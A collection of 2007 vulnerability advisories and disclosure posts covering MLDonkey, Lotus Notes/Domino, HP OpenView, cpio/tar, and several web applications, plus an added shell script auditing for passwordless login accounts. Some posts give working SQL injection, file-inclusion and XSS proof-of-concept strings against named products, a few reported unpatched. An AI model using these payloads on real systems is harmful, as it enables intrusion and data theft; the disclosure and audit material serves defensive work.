[ GLSA 200710-25 ] MLDonkey: Privilege escalation
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200710-25
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: MLDonkey: Privilege escalation
      Date: October 24, 2007
      Bugs: #189412
        ID: 200710-25

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The Gentoo MLDonkey ebuild adds a user to the system with a valid login
shell and no password.

Background
==========

MLDonkey is a peer-to-peer filesharing client that connects to several
different peer-to-peer networks, including Overnet and BitTorrent.

Affected packages
=================

    -------------------------------------------------------------------
     Package             /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  net-p2p/mldonkey        < 2.9.0-r3                    >= 2.9.0-r3

Description
===========

The Gentoo MLDonkey ebuild adds a user to the system named "p2p" so that
the MLDonkey service can run under a user with low privileges. This user
is created with a valid login shell and no password.

Impact
======

A remote attacker could log into a vulnerable system as the p2p user.
This would require an installed login service that permitted empty
passwords, such as SSH configured with the "PermitEmptyPasswords yes"
option, a local login console, or a telnet server.

Workaround
==========

See Resolution.

Resolution
==========

Change the p2p user's shell to disallow login. For example, as root run
the following command:

    # usermod -s /bin/false p2p

NOTE: updating to the current MLDonkey ebuild will not remove this
vulnerability; it must be fixed manually. The updated ebuild is to
prevent this problem from occurring in the future.

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200710-25.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
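An added defensive check, not part of the GLSA: a small POSIX shell audit that finds the exact condition the advisory describes, an account whose shadow password field is empty while its login shell is still a real shell. The passwd and shadow lines it runs against are constructed sample data, and the no-login shell list is an assumption for the example.

```shell
#!/bin/sh
# Added example, not part of GLSA 200710-25: audit for accounts that combine an
# empty password with a real login shell, which is the state the advisory
# describes for the "p2p" user. Works on passwd/shadow-format files, so it can
# be run on the live files as root or on copies pulled from a host.

# Print "user shell" for every account whose shadow password field (field 2)
# is empty and whose shell is not one of the usual no-login shells.
# Locked accounts ("!" or "*" in the password field) are not reported.
find_empty_password_logins() {
    passwd_file=$1
    shadow_file=$2
    awk -F: '$2 == "" { print $1 }' "$shadow_file" | while IFS= read -r user; do
        shell=$(awk -F: -v u="$user" '$1 == u { print $7 }' "$passwd_file")
        case "$shell" in
            ""|/bin/false|/usr/bin/false|/sbin/nologin|/usr/sbin/nologin) ;;
            *) printf '%s %s\n' "$user" "$shell" ;;
        esac
    done
}

# Run the audit on constructed sample data (the root hash is a placeholder).
# "guest" has an empty password but a nologin shell, so only "p2p" is reported.
run_sample() {
    p=$(mktemp) && s=$(mktemp) || return 1
    printf '%s\n' \
        'root:x:0:0:root:/root:/bin/bash' \
        'p2p:x:1001:1001:MLDonkey:/home/p2p:/bin/bash' \
        'nobody:x:65534:65534:nobody:/:/sbin/nologin' \
        'guest:x:1002:1002:guest:/home/guest:/sbin/nologin' > "$p"
    printf '%s\n' \
        'root:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:13800:0:99999:7:::' \
        'p2p::13800:0:99999:7:::' \
        'nobody:!:13800:0:99999:7:::' \
        'guest::13800:0:99999:7:::' > "$s"
    find_empty_password_logins "$p" "$s"
    rm -f "$p" "$s"
}

# Remediation per the advisory is to remove the login shell, e.g.
#   usermod -s /bin/false p2p
# Rerun the audit afterwards: an empty result means no such account remains.
run_sample
```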
iDefense Security Advisory 10.23.07: IBM Lotus Notes Client TagAttributeListCopy Buffer Overflow Vulnerability
IBM Lotus Notes Client TagAttributeListCopy Buffer Overflow Vulnerability

iDefense Security Advisory 10.23.07
http://labs.idefense.com/intelligence/vulnerabilities/
Oct 23, 2007

I. BACKGROUND

IBM Corp.'s Lotus Notes software is an integrated desktop client option
for accessing e-mail, calendars and applications on an IBM Corp. Lotus
Domino server. More information can be found by visiting the URL below.

http://www-142.ibm.com/software/sw-lotus/products/product4.nsf/wdocs/noteshomepage

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in IBM Corp.'s
Lotus Notes mail user agent could allow attackers to execute arbitrary
code in the context of the current user.

When a Lotus Notes user receives an HTML email, the HTML is converted to
a format resembling RTF (Rich Text Format). When messages are replied
to, forwarded or copied to the clipboard, the e-mail format is converted
again.

The buffer overflow is the result of a call to "Cstrcpy" when copying an
attacker supplied variable length string into a fixed-sized stack
buffer. The overflow occurs at the "Cstrcpy" call inside the
"TagAttributeListCopy" function in nnotes.dll.

III. ANALYSIS

Exploitation allows attackers to execute arbitrary code in the context of
the recipient of the message. In order to be successful, an attacker must
social engineer the victim into processing a specially crafted message in
a certain way. Specifically, the victim must either forward, reply with
history, or copy the message to the clipboard in order to trigger the
vulnerability.

Additionally, non-printable ASCII characters are converted to the LMBCS
(Lotus MultiByte Character Set) before the overflow occurs. This
complicates, but does not prevent, exploitation.

IV. DETECTION

iDefense confirmed the existence of this vulnerability in version 7.0.2
of IBM Corp.'s Lotus Notes. Additionally, versions 6.5.1, 6.5.3 and 7.0.1
were reported to be vulnerable. Other versions are suspected to be
vulnerable.

V. WORKAROUND

iDefense is currently unaware of any effective workaround for this issue.

VI. VENDOR RESPONSE

IBM Lotus has addressed this vulnerability within versions 7.0.3 and 8.0
of Lotus Notes. For more information, visit the following URL.

http://www-1.ibm.com/support/docview.wss?rs=477&uid=swg21272930

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-4222 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

02/07/2007  Initial vendor notification
02/07/2007  Initial vendor response
10/23/2007  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by UVInc.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
iDefense Security Advisory 10.23.07: IBM Lotus Domino IMAP Buffer Overflow Vulnerability
IBM Lotus Domino IMAP Buffer Overflow Vulnerability

iDefense Security Advisory 10.23.07
http://labs.idefense.com/intelligence/vulnerabilities/
Oct 23, 2007

I. BACKGROUND

IBM Lotus Domino Server software provides messaging, calendaring and
scheduling capabilities on a variety of operating systems. More
information about the product is available at the following URL.

http://www-142.ibm.com/software/sw-lotus/domino

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability within IBM Corp.'s
Lotus Domino allows attackers to execute arbitrary code in the context of
the IMAP service.

This vulnerability exists within the IMAP component of a Domino Server.
The problem specifically lies in the handling of mailbox names within
specific commands. If a user has subscribed to a mailbox with an overly
long name, certain commands will copy the user-supplied mailbox name into
a fixed-size stack buffer without proper validation.

III. ANALYSIS

Exploitation allows attackers to execute arbitrary code in the context of
the IMAP service. In order to conduct the attack, the attacker must be
able to establish a TCP session with the IMAP service on TCP port 143.
Valid credentials are required to access the vulnerable code.

Under Windows, the privileges gained are (by default) that of the SYSTEM
user. This allows an attacker to take complete control of the compromised
system. Although the UNIX version of the service does not run as root, it
does run as the same user as many other components of the Lotus Domino
Server. Because of this an attacker may gain access to sensitive
information or be able to maliciously subvert the system in other ways.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability within version
7.0.2.2 of Lotus Domino running on Linux as well as Windows Server 2003.
Previous versions, as well as builds for other platforms, are suspected
to be vulnerable.

V. WORKAROUND

Employing firewalls to limit access to the affected service will mitigate
exposure to this vulnerability.

VI. VENDOR RESPONSE

IBM Lotus has addressed this vulnerability within versions 6.5.6 Fix Pack
2 (FP2), 7.0.3 and 8.0 of Lotus Domino. For more information, visit the
following URL.

http://www-1.ibm.com/support/docview.wss?rs=477&uid=swg21270623

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-3510 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

06/27/2007  Initial vendor notification
06/28/2007  Initial vendor response
10/23/2007  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Manuel Santamarina Suarez.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
OSI CODES - PHP Live! Remote File Inclusion
Aria-Security Team
http://Aria-Security.Net
Persian Security Network

Source Code:

Affected file: Index.php

Poc:

/index.php?DOCUMENT_ROOT=file.txt ?

Credits: Aria-Security
The-0utl4w
Novell OpenSUSE SWAMP multiple XSS
Vendor Site: http://en.opensuse.org/Swamp
Version affected: ???
Demo: http://swampdemo.suse.de/webswamp/swamp/template/Index.vm
Class: Input Validation Error

Overview:
OpenSUSE Workflow Administration and Management Platform login page
fails to sufficiently sanitize user-supplied input data via login box.

Example:
1. alert('xss')
2. XSS
3. http://site.com/xss.swf";
Bosdev Multiple vulnerabilities
BosMarket Business Directory System
http://www.bosdev.com

BosMarket Multiple XSS vulnerabilities

BosMarket is a craigslist like application that attempts to let users
refer other small businesses. The problem is that when you post
listings, it's a no holds barred kind of deal.

Firstly, one can place XSS code into their user info. Just email the
admin claiming your account details are screwy, and wham, easy access.

The next vulnerability is within posts themselves. Once again, XSS code
is not filtered.

BosNews v4 XSS

Then there is BosNews. The program allows for anonymous people to post
news. There is a form of BB code in use, but that doesn't stop the fact
that script tags can be used as well. It's cookie based auth, so cookie
theft is a snap, among other things people do with XSS.

I emailed the guys at bosdev and am awaiting a response. Have fun.

BosNews v4, v5 Install.php auth override.

Using BosNews, we can install over the old installation without a
username or password. It actually overwrites the old one. If you have
the database info, it will even let you create a new admin username /
password.

I emailed the guys at bosdev and am awaiting a response. Have fun.
rPSA-2007-0222-1 cpio tar
rPath Security Advisory: 2007-0222-1
Published: 2007-10-23
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
    Indirect Deterministic Denial of Service
Updated Versions:
    [EMAIL PROTECTED]:1/2.6-14.1-1
    [EMAIL PROTECTED]:1/1.15.1-7.3-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-1861

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4476

Description:
    Previous versions of the cpio and tar packages are vulnerable to a
    Denial of Service attack in which an attacker can use a malformed
    archive file to cause a stack-based buffer overflow, crashing the
    application. It is not believed that this vulnerability can be
    exploited to execute malicious code.

http://wiki.rpath.com/Advisories:rPSA-2007-0222

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html
[Aria-Security.Net] CodeWidgets.Com Online Event Registration Multiple login SQL Injection
http://Aria-Security.Net - CodeWidgets.Com Online Event Registration

Poc

Normal User account: (login.asp)
Email address: ' UNION SELECT * FROM users
password: Aria-Security.Net

Admin Panel: (admin_login.asp)
Email address: ' UNION SELECT * FROM admin
Password: Aria-Security.Net

Credits Goes To Aria-Security Team

Regards,
The-0utl4w
[GS07-02] RSA Keon Multiple Cross-Site Scripting Vulnerabilities
GS07-02 RSA Keon Multiple Cross-Site Scripting Vulnerabilities

Date & Version : 07/31/2007 - 1.0

Description :

RSA KEON Registration Authority Web Interface has multiple Cross-Site
Scripting Vulnerabilities. Request-spk.xuda and Add-msie-request.xuda
components of RSA KEON are vulnerable to Cross-Site Scripting attacks.
An attacker could use these vulnerabilities for manipulating the
registration information, phishing and other client side attacks.

Risk Level : Medium
Impact : Gain Access
Systems Affected : RSA KEON Registration Authority Software
Remedy : Contact RSA and visit https://knowledge.rsasecurity.com for
remediation.

Credits :
Fatih Ozavci (GamaTEAM Member)
Caglar Cakici (GamaTEAM Member)

It's detected using GamaSEC Exploit Framework
GamaSEC.net Security Solutions (www.gamasec.net)

Original Advisory Link : http://www.gamasec.net/english/gs07-02.html

References :
1. CERT - Vulnerability Note VU#342793
Aleris Software Systems Web Publisher Calendar SQL injection
http://www.alerisdata.com/articles/home.asp

There exists an SQL injection vulnerability within the calendar section
of an Aleris Software Systems web publisher. It seems that Aleris uses
this same calendar with every site they make that utilizes the
publisher.

www.example.com/calendar/page.asp?mode=1%20union%20all%20select%201,2,3,4,5,6%20FROM%20users--

I reported this to aleris and am awaiting a response. No fix yet.
HPSBMA02279 SSRT071298 rev.1 - HP OpenView Configuration Management (CM) Infrastructure (Radia) and Client Configuration Manager (CCM) Running httpd.tkd, Remote Unauthorized Access to Data
SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01205079
Version: 1

HPSBMA02279 SSRT071298 rev.1 - HP OpenView Configuration Management (CM)
Infrastructure (Radia) and Client Configuration Manager (CCM) Running
httpd.tkd, Remote Unauthorized Access to Data

NOTICE: The information in this Security Bulletin should be acted upon
as soon as possible.

Release Date: 2007-10-23
Last Updated: 2007-10-23

Potential Security Impact: Remote unauthorized access to data

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential vulnerability has been identified with HP OpenView
Configuration Management (CM) Infrastructure (Radia) and Client
Configuration Manager (CCM) running httpd.tkd. The vulnerability could
be exploited to allow remote unauthorized access to data.

References: CVE-2007-5413

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenView Configuration Management (CM) Infrastructure (Radia) v4.0,
v4.1, v4.2, v4.2i running httpd.tkd on Windows, HP-UX, AIX, Solaris,
and Linux.
HP OpenView Client Configuration Manager (CCM) v2.0 running httpd.tkd
on Windows.

BACKGROUND

The Hewlett-Packard Company thanks an anonymous researcher working with
TippingPoint (www.tippingpoint.com) and the Zero Day Initiative
(www.zerodayinitiative.com) for reporting this to [EMAIL PROTECTED]

Note: The httpd.tkd module is used by several OpenView Configuration
Management (CM) and OpenView Client Configuration Management (CCM)
Infrastructure components. These components include OS Manager, Policy
Server, Portal, Patch Manager, Proxy Server, Distributed Configuration
Server and Multicast Server. There may be more than one httpd.tkd module
on a system. Each must be replaced. Please refer to the patch
documentation for further information.

Note: The following is for use by the HP-UX Software Assistant.
Only the HP-UX versions are listed

AFFECTED VERSIONS

For CM infrastructure (Radia) v4.0
HP-UX B.11.00
HP-UX B.11.11
HP-UX B.11.23
===========
action: install RADINFRAHPUX1_9 or subsequent
URL: http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAHPUX1_9

For CM infrastructure (Radia) v4.1
HP-UX B.11.00
HP-UX B.11.11
HP-UX B.11.23
===========
action: install RADINFRAHPUX1_00010 or subsequent
URL: http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAHPUX1_00010

For CM infrastructure (Radia) v4.2
HP-UX B.11.00
HP-UX B.11.11
HP-UX B.11.23
===========
action: install RADINFRASOL_00011 or subsequent
URL: http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRASOL_00011

End Affected Versions

RESOLUTION

HP has provided the following patches to resolve this vulnerability.
The patches and installation instructions are available from the URL's
listed below.

Product                  Platform        Patch ID                           URL
CM Infrastructure v4.0   AIX             RADINFRAAIX_8 or subsequent        http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAAIX_8
CM Infrastructure v4.0   HP-UX B.11.00   RADINFRAHPUX1_9 or subsequent      http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAHPUX1_9
CM Infrastructure v4.0   HP-UX B.11.11   RADINFRAHPUX1_9 or subsequent      http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAHPUX1_9
CM Infrastructure v4.0   HP-UX B.11.23   RADINFRAHPUX1_9 or subsequent      http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAHPUX1_9
CM Infrastructure v4.0   Linux           RADINFRALNX_7 or subsequent        http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRALNX_7
CM Infrastructure v4.0   Solaris         RADINFRASOL_9 or subsequent        http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRASOL_9
CM Infrastructure v4.0   Win32           RADINFRAWIN32_00023 or subsequent  http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAWIN32_00023
CM Infrastructure v4.0i  Win32           RADINFRAWIN32_00024 or subsequent  http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAWIN32_00024
CM Infrastructure v4.1   AIX             RADINFRAAIX_9 or subsequent        http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAAIX_9
CM Infrastructure v4.1   HP-UX B.11.00   RADINFRAHPUX1_00010 or subsequent  http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAHPUX1_00010
CM Infrastructure v4.1   HP-UX B.11.11   RADINFRAHPUX1_00010 or subsequent  http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAHPUX1_00010
CM Infrastructure v4.1   HP-UX B.11.23   RADINFRAHPUX1_00010 or subsequent  http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAHPUX1_00010
CM Infrastructure v4.1   Linux           RADINFRALNX_8 or subsequent        http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRALNX_8
CM Infrastructure v4.1   Solaris         RADINFRASOL_00010 or subsequent    http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRASOL_00010
CM Infrastructure v4.1   Win32           RADINFRAWIN32_00025 or subsequent  http://openview.hp.com/ecare/getsupportdoc?docid=RADI
Aria-Security.Net [Web based alpha tabbed address book SQL Injection]
http://Aria-Security.Net

Web based alpha tabbed address book SQL Injection [codewidgets.com]

Poc

index.asp?alpha='[SQL INJECTION]

Credits Goes To Aria-Security Team

Regards,
The-0utl4w